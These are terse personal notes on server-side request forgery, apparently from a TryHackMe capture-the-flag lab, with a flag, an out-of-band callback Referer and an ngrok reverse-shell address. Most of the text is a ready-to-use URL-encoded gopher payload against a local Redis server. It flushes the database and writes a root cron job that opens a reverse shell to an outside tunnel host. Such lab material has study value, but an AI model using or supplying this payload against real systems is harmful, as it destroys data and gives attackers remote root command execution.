SSRF
Server  SIde Request fORGERY

P -> CALLING PATH OR URL
WE CAN FORCE IT TO CALL 
INTERNAL -> LOCALHOST OR LOCALOHOST/ADMIN
EXTERNAL -> MY Server


Referer: https://rhcj6yxcbohlreskarbje9el0c63uwil.oastify.com

Interview -> ssrf external vs RFI ?
shellshock concetpt ? 
SSRF TO RCE

                        Flag: THM_{B@$ic_s$rF}

ReverseShelltcp://5.tcp.eu.ngrok.io:10105


gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2481%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/on-clan.gl.at.ply.gg:44485/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2416%0D%0A/var/spool/cron/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A



	